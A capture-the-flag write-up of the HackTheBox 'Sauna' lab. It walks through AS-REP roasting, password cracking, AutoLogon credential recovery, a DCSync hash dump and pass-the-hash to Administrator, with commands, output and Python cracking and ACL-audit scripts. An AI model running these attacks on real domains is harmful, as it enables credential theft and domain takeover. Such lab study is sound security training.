Hi everyone, this time I'm covering another HackTheBox machine from the Active Directory track: Sauna.
As usual, the first step is a port scan with nmap (-A already implies -sC, -sV and -O, so the extra flags here are redundant but harmless; -T5 is fast but can miss ports on a laggy link).
└─# nmap -sSCV -O -A 10.10.10.175 -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-20 08:03 EST
Nmap scan report for 10.10.10.175
Host is up (0.18s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Egotistical Bank :: Home
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-20 20:03:33Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: 6h59m58s
| smb2-time:
| date: 2024-12-20T20:04:04
|_ start_date: N/A
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 178.98 ms 10.10.14.1
2 179.04 ms 10.10.10.175
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 105.85 seconds
The IIS 10.0 banner narrows the host to Windows 10 / Server 2016 / Server 2019 (nmap's OS guess is Server 2019), and the LDAP banner gives the domain name EGOTISTICAL-BANK.LOCAL. Also note the clock skew of almost 7 hours in the SMB script output: Kerberos rejects requests whose timestamp is more than 5 minutes off (KRB_AP_ERR_SKEW), so before using Kerberos tickets against this DC, sync your clock to it (for example with ntpdate against the DC, or by running the tools under faketime).

Next, check SMB for anonymous access with smbclient.
└─# smbclient -N -L //10.10.10.175
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.175 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
Anonymous login is accepted but no shares are listed (the SMB1 fallback failing afterwards is normal on a modern DC), so nothing useful there. Next we move to Kerberos and enumerate valid usernames with kerbrute (https://github.com/ropnop/kerbrute). It sends an AS-REQ without pre-authentication for each name: the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for a name that does not exist, KDC_ERR_PREAUTH_REQUIRED for a valid one, and, for a valid account with pre-authentication disabled, an AS-REP straight away, which is what the next step exploits.
Here we end up with this list of usernames: fsmith, scoins, sdriver, btayload, hbear, skerb.
Next we request AS-REPs for those users with Impacket's GetNPUsers.py (saved locally as get.py) to see which of them have "Do not require Kerberos preauthentication" set; such an account returns an AS-REP encrypted with its own password-derived key, which we can crack offline (AS-REP roasting).
└─# python3 get.py -no-pass -usersfile user.txt -dc-ip 10.10.10.175 EGOTISTICAL-BANK.LOCAL/
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:.............1a417738$ef4cee586cc339e42159aa3eca99ae62b4aedd3f67001b16dc035404c9edcd8c065b30606ba22f176f6b8ec530d56ab134f4f9dc97953b8a4817e2612eadc8c060ef7c5878a0010b82da75fa4192c892fa9fb813974c5588a8352d417331f5d285bc0a5b18c2e4a900bb0dbacb58d45665fdf3148888a19a8581e4a018e5f97aaaf4bfe8787a5fa6f1d83d934fdecd219ba02a3eb98e11f758a4755b5bdd57d73e34ce7dbd69a5f11c5525adc9b2a97b0421e65c6c2ce1a479741a63e972230934e58773746b28261fc698cce9f1512e15b1f21114c5d0a948c7eef1ee95a3abb39e7dfad43867a4c21c80f37261c43f7cfcfd75c671de1d37ef32e2d659ad47
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
We got a hash for fsmith only; the other five names came back as KDC_ERR_C_PRINCIPAL_UNKNOWN, so the KDC has no such principals and fsmith is the only confirmed account. The $krb5asrep$23$ prefix says the hash is etype 23 (RC4-HMAC), the cheap-to-crack kind. Put the hash line in a file and crack it with john against rockyou:
┌──(root㉿kali)-[~/latihan/sauna]
└─# john -w=/usr/share/wordlists/rockyou.txt jsmist
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thes..... ($krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL)
1g 0:00:00:03 DONE (2024-12-20 08:24) 0.2659g/s 2802Kp/s 2802Kc/s 2802KC/s Thrall..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
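To see what john is actually doing with that $krb5asrep$23$ line, here is an added example (my own code, not from the original post, Impacket or john): a minimal cracker for etype-23 (RC4-HMAC) AS-REP hashes in pure Python. The password, the encrypted body and the 8-byte confounder in the sample are constructed here and are not fsmith's real ones; MD4 is implemented inline because hashlib on OpenSSL 3 builds often refuses it.

```python
import hashlib
import hmac
import struct

AS_REP_KEY_USAGE = 8  # RFC 4120 key-usage number for the AS-REP enc-part

def md4_pure(data: bytes) -> bytes:
    """MD4 per RFC 1320; fallback for Python builds whose hashlib has no md4."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = rotl((a + f(b, c, d) + x[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = rotl((a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            a = rotl((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d)

def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos key."""
    data = password.encode("utf-16le")
    try:
        return hashlib.new("md4", data).digest()
    except ValueError:  # OpenSSL 3 without the legacy provider
        return md4_pure(data)

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()

def parse_asrep_hash(line: str):
    """Split '$krb5asrep$23$user@REALM:<checksum hex>$<ciphertext hex>'."""
    _, tag, etype, principal_and_cksum, ciphertext = line.strip().split("$")
    if tag != "krb5asrep" or etype != "23":
        raise ValueError("only RC4-HMAC (etype 23) AS-REP hashes are handled here")
    principal, cksum = principal_and_cksum.split(":")
    return principal, bytes.fromhex(cksum), bytes.fromhex(ciphertext)

def crack_asrep(line: str, candidates):
    """RFC 4757 per guess: K1 = HMAC(K, usage), K3 = HMAC(K1, checksum),
    plaintext = RC4(K3, ciphertext); the guess is right iff HMAC(K1, plaintext) == checksum."""
    principal, checksum, ciphertext = parse_asrep_hash(line)
    usage = struct.pack("<I", AS_REP_KEY_USAGE)
    for guess in candidates:
        k1 = hmac_md5(nt_hash(guess), usage)
        plaintext = rc4(hmac_md5(k1, checksum), ciphertext)
        if hmac.compare_digest(hmac_md5(k1, plaintext), checksum):
            return principal, guess
    return principal, None

def build_sample_asrep(user, realm, password, enc_part, confounder=b"\x00" * 8):
    """KDC side of the same algorithm; used here only to construct a test hash offline."""
    k1 = hmac_md5(nt_hash(password), struct.pack("<I", AS_REP_KEY_USAGE))
    data = confounder + enc_part
    checksum = hmac_md5(k1, data)
    return "$krb5asrep$23$%s@%s:%s$%s" % (
        user, realm, checksum.hex(), rc4(hmac_md5(k1, checksum), data).hex())

# Constructed sample: made-up password and a dummy stand-in for the EncASRepPart body.
SAMPLE_PASSWORD = "Winter2019!"
SAMPLE_HASH = build_sample_asrep("fsmith", "EGOTISTICAL-BANK.LOCAL", SAMPLE_PASSWORD,
                                 b"\x79\x81\x01\x2a" + b"dummy EncASRepPart " * 4)

if __name__ == "__main__":
    print(crack_asrep(SAMPLE_HASH, ["Password1", "Thrall", "Thehunter22", SAMPLE_PASSWORD]))
```

Pointing crack_asrep at the real GetNPUsers line with rockyou.txt does the same thing john did, only far slower. The point for defenders is the cost per guess: one MD4 plus three HMAC-MD5 and one RC4, which is why a weak password on an account with pre-authentication disabled falls in seconds. Clearing "Do not require Kerberos preauthentication" removes the exposure entirely, and restricting the account to AES (etype 17/18, whose AS-REP hashes go through PBKDF2 and which john lists in the same format line above) makes any remaining hash orders of magnitude slower to crack.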
That gives us the password. Log in with evil-winrm (WinRM on TCP 5985 is not among nmap's default top-1000 ports, which is why it is missing from the scan above even though it is open; a full -p- scan would show it) and we get a shell plus the user flag.
└─# evil-winrm -i 10.10.10.175 -u fsmith -p 'Thest....'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\FSmith\Documents> whoami
egotisticalbank\fsmith
*Evil-WinRM* PS C:\Users\FSmith\Documents>
*Evil-WinRM* PS C:\Users\FSmith\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\FSmith\Desktop> dir
Directory: C:\Users\FSmith\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 12/20/2024 12:02 PM 34 user.txt
*Evil-WinRM* PS C:\Users\FSmith\Desktop> type user.txt
0761b9625a9d2499c3.............
Next, for privilege escalation, upload winPEAS to the target. Run evil-winrm from the directory that holds winpeas.exe so the upload path is just the file name.
*Evil-WinRM* PS C:\Users\FSmith\Documents> upload winpeas.exe
Info: Uploading /root/hackthebox/sauna/winpeas.exe to C:\Users\FSmith\Documents\winpeas.exe
Data: 13122900 bytes of 13122900 bytes copied
Info: Upload successful!
Once uploaded, run it. Among the findings, winPEAS reports that EGOTISTICALBANK\svc_loanmanager is set to log on automatically, with the password stored next to it. (AutoLogon keeps these as the DefaultUserName and DefaultPassword values under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon, in clear text, which is why winPEAS can simply read them.)
The registry username does not match the real account name: the domain account is svc_loanmgr (it appears under that name in the secretsdump output further down), so that is the name we log in with, together with the recovered password.
└─# evil-winrm -i 10.10.10.175 -u 'svc_loanmgr' -p 'Moneymakesth........'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> whoami
egotisticalbank\svc_loanmgr
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents>
From here we upload SharpHound (saved as sharp.exe) and run it to collect the domain data.
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> upload sharp.exe
Info: Uploading /root/hackthebox/sauna/sharp.exe to C:\Users\svc_loanmgr\Documents\sharp.exe
Data: 2076672 bytes of 2076672 bytes copied
Info: Upload successful!

Once the collection finishes, download the zip it produced.
*Evil-WinRM* PS C:\Users\svc_loanmgr\Documents> download 20241220140529_BloodHound.zip
Info: Downloading C:\Users\svc_loanmgr\Documents\20241220140529_BloodHound.zip to 20241220140529_BloodHound.zip
Info: Download successful!
Then start BloodHound, import the zip, and once the data is ingested, work out the escalation path:
step 1: search for SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL, right-click the user node and choose Mark User as Owned
step 2: in the Analysis tab, run the shortest-path query to Domain Admins
step 3: right-click the edge between the two nodes and choose Help
This shows that SVC_LOANMGR@EGOTISTICAL-BANK.LOCAL holds the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All extended rights on the domain EGOTISTICAL-BANK.LOCAL (the GetChanges and GetChangesAll edges).
Those two rights together are exactly what a domain controller uses to replicate, so any principal holding both can ask the DC for password hashes over the replication protocol (DRSUAPI) without ever touching NTDS.dit on disk. That is the DCSync attack, so we run it.
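BloodHound gets those edges from the DACL of the domain object (its nTSecurityDescriptor attribute). As an added example (my code, not BloodHound's or Impacket's), here is a pure-Python audit that takes that descriptor in its binary self-relative form, walks the object ACEs, and reports every SID granted both replication extended rights, which is precisely the DCSync condition. The descriptor is constructed inside the script with a made-up domain SID; the RIDs 1105 and 1108 are the FSmith and svc_loanmgr RIDs shown in the secretsdump output further down.

```python
import struct
import uuid

# rightsGuid values of the two controlAccessRight schema objects DCSync needs.
GET_CHANGES = uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2")      # DS-Replication-Get-Changes
GET_CHANGES_ALL = uuid.UUID("1131f6ad-9c07-11d1-f79f-00c04fc2dcd2")  # DS-Replication-Get-Changes-All
DS_CONTROL_ACCESS = 0x100          # access-mask bit under which extended rights are granted
ACCESS_ALLOWED_OBJECT_ACE = 0x05   # ACE type that can carry an object-type GUID
OBJECT_TYPE_PRESENT, INHERITED_OBJECT_TYPE_PRESENT = 0x1, 0x2

def sid_to_str(raw: bytes) -> str:
    revision, count = raw[0], raw[1]
    authority = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack("<%dI" % count, raw[8:8 + 4 * count])
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)

def str_to_sid(text: str) -> bytes:
    revision, authority, *subs = (int(p) for p in text.split("-")[1:])
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
            + struct.pack("<%dI" % len(subs), *subs))

def object_aces(sd: bytes):
    """Walk a self-relative SECURITY_DESCRIPTOR's DACL and yield (sid, mask, object_type)
    for each ACCESS_ALLOWED_OBJECT_ACE; other ACE types (plain allow, deny, audit) are skipped."""
    _rev, _sbz, _control, _owner, _group, _sacl, dacl_off = struct.unpack("<BBHIIII", sd[:20])
    if dacl_off == 0:
        return
    _acl_rev, _sbz1, _acl_size, ace_count, _sbz2 = struct.unpack("<BBHHH", sd[dacl_off:dacl_off + 8])
    pos = dacl_off + 8
    for _ in range(ace_count):
        ace_type, _ace_flags, ace_size = struct.unpack("<BBH", sd[pos:pos + 4])
        if ace_type == ACCESS_ALLOWED_OBJECT_ACE:
            mask, obj_flags = struct.unpack("<II", sd[pos + 4:pos + 12])
            p, obj_type = pos + 12, None
            if obj_flags & OBJECT_TYPE_PRESENT:  # GUID is stored in Windows mixed-endian (bytes_le) form
                obj_type, p = uuid.UUID(bytes_le=sd[p:p + 16]), p + 16
            if obj_flags & INHERITED_OBJECT_TYPE_PRESENT:
                p += 16
            yield sid_to_str(sd[p:pos + ace_size]), mask, obj_type
        pos += ace_size

def dcsync_capable(sd: bytes):
    """SIDs that are granted BOTH Get-Changes and Get-Changes-All on this object."""
    granted = {}
    for sid, mask, obj_type in object_aces(sd):
        if mask & DS_CONTROL_ACCESS and obj_type in (GET_CHANGES, GET_CHANGES_ALL):
            granted.setdefault(sid, set()).add(obj_type)
    return sorted(sid for sid, rights in granted.items() if rights == {GET_CHANGES, GET_CHANGES_ALL})

# ---- builders, used only to construct the sample descriptor below ----
def object_ace(sid: str, mask: int, guid: uuid.UUID) -> bytes:
    body = struct.pack("<II", mask, OBJECT_TYPE_PRESENT) + guid.bytes_le + str_to_sid(sid)
    return struct.pack("<BBH", ACCESS_ALLOWED_OBJECT_ACE, 0, 4 + len(body)) + body

def self_relative_sd(aces) -> bytes:
    dacl = struct.pack("<BBHHH", 4, 0, 8 + sum(map(len, aces)), len(aces), 0) + b"".join(aces)
    # control 0x8004 = SE_SELF_RELATIVE | SE_DACL_PRESENT; owner, group and SACL left out
    return struct.pack("<BBHIIII", 1, 0, 0x8004, 0, 0, 0, 20) + dacl

DOMAIN = "S-1-5-21-100000000-200000000-300000000"  # constructed domain SID, not Sauna's
SAMPLE_SD = self_relative_sd([
    object_ace("S-1-5-9", DS_CONTROL_ACCESS, GET_CHANGES),           # Enterprise Domain Controllers
    object_ace("S-1-5-9", DS_CONTROL_ACCESS, GET_CHANGES_ALL),       # (legitimately needs both)
    object_ace(DOMAIN + "-1105", DS_CONTROL_ACCESS, GET_CHANGES),     # FSmith: one right only, no DCSync
    object_ace(DOMAIN + "-1108", DS_CONTROL_ACCESS, GET_CHANGES),     # svc_loanmgr: both rights
    object_ace(DOMAIN + "-1108", DS_CONTROL_ACCESS, GET_CHANGES_ALL),
])

if __name__ == "__main__":
    for sid in dcsync_capable(SAMPLE_SD):
        print("can DCSync:", sid)
```

Against a real domain you would read the attribute over LDAP with the SD-flags control set to return only the DACL (ldap3 exposes this as security_descriptor_control(sdflags=0x04)) and feed the bytes to dcsync_capable. Anything in the result other than Enterprise Domain Controllers (S-1-5-9), the Domain Controllers group, Administrators and the Domain/Enterprise Admins SIDs is a DCSync path to remove. Deny ACEs and group nesting are out of scope for this short script, so treat its output as a starting list rather than a final answer.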

We dump the domain credentials with secretsdump.py from Impacket (saved locally as scret.py): https://github.com/fortra/impacket/blob/master/examples/secretsdump.py. The rpc_s_access_denied line at the top of the output is expected: secretsdump first tries the remote-registry route (SAM and LSA secrets), which needs local administrator rights that svc_loanmgr lacks; it then falls back to the DRSUAPI method, which only needs the two replication rights, and that fallback is the DCSync.
└─# python3 scret.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452.......70ebdf86c7f98e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4a8899428cad97676ff802229e466e2c:::
EGOTISTICAL-BANK.LOCAL\HSmith:1103:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\FSmith:1105:aad3b435b51404eeaad3b435b51404ee:58a52d36c84fb7f5f1beab9a201db1dd:::
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:1108:aad3b435b51404eeaad3b435b51404ee:9cb31797c39a9b170b04058ba2bba48c:::
SAUNA$:1000:aad3b435b51404eeaad3b435b51404ee:3ef44b88a0af62c98a46c759486dc05c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
krbtgt:aes256-cts-hmac-sha1-96:83c18194bf8bd3949d4d0d94584b868b9d5f2a54d3d6f3012fe0921585519f24
krbtgt:aes128-cts-hmac-sha1-96:c824894df4c4c621394c079b42032fa9
krbtgt:des-cbc-md5:c170d5dc3edfc1d9
EGOTISTICAL-BANK.LOCAL\HSmith:aes256-cts-hmac-sha1-96:5875ff00ac5e82869de5143417dc51e2a7acefae665f50ed840a112f15963324
EGOTISTICAL-BANK.LOCAL\HSmith:aes128-cts-hmac-sha1-96:909929b037d273e6a8828c362faa59e9
EGOTISTICAL-BANK.LOCAL\HSmith:des-cbc-md5:1c73b99168d3f8c7
EGOTISTICAL-BANK.LOCAL\FSmith:aes256-cts-hmac-sha1-96:8bb69cf20ac8e4dddb4b8065d6d622ec805848922026586878422af67ebd61e2
EGOTISTICAL-BANK.LOCAL\FSmith:aes128-cts-hmac-sha1-96:6c6b07440ed43f8d15e671846d5b843b
EGOTISTICAL-BANK.LOCAL\FSmith:des-cbc-md5:b50e02ab0d85f76b
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes256-cts-hmac-sha1-96:6f7fd4e71acd990a534bf98df1cb8be43cb476b00a8b4495e2538cff2efaacba
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:aes128-cts-hmac-sha1-96:8ea32a31a1e22cb272870d79ca6d972c
EGOTISTICAL-BANK.LOCAL\svc_loanmgr:des-cbc-md5:2a896d16c28cf4a2
SAUNA$:aes256-cts-hmac-sha1-96:fceff73567f68ddb62d43ffc96dec0a09c4e0274ba1bed9ce6d70678a289d464
SAUNA$:aes128-cts-hmac-sha1-96:dc7aad98998001aa9121f3b711a921f0
SAUNA$:des-cbc-md5:5b2957eafddc6b1c
That gives us the Administrator NT hash. There is no need to crack it: evil-winrm accepts it directly with -H (pass-the-hash over WinRM), so we log in as Administrator and read root.txt from the Desktop. Note that the same dump also contains the krbtgt hash and AES keys, so on a real engagement this output means the whole domain has to be treated as compromised and the krbtgt password reset.
└─# evil-winrm -u 'Administrator' -H '823452073d75b9d1cf7........f98e' -i 10.10.10.175
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
egotisticalbank\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
23e4df5dde3de3862.....................
*Evil-WinRM* PS C:\Users\Administrator\Desktop>